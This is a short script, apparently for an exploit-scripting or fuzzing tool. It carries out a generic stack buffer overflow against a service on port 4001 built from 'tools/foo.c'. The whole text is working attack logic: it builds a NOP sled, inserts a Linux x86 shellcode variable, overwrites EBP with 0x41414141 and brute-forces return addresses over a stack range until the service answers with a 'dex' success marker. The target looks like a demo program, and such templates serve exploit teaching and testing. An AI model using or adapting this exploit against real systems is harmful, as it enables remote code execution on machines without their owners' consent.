# Generic buffer overflow exploit, if we get 'dex\n' then we just exploited it :) # for tools/foo.c # if you get '|dex|[0a]' you're done :) port=4001/tcp var size = 1040 var shellcode = $linux_x86_dex_scode var nops_length = %length(*$size-$shellcode-8) var nops = [\x90x$nops_length] var ebp = |0x41414141| peer write: $nops,$shellcode,$ebp,{bfffbd2a-bfffffff x 100} peer read repeat=1024 wait=1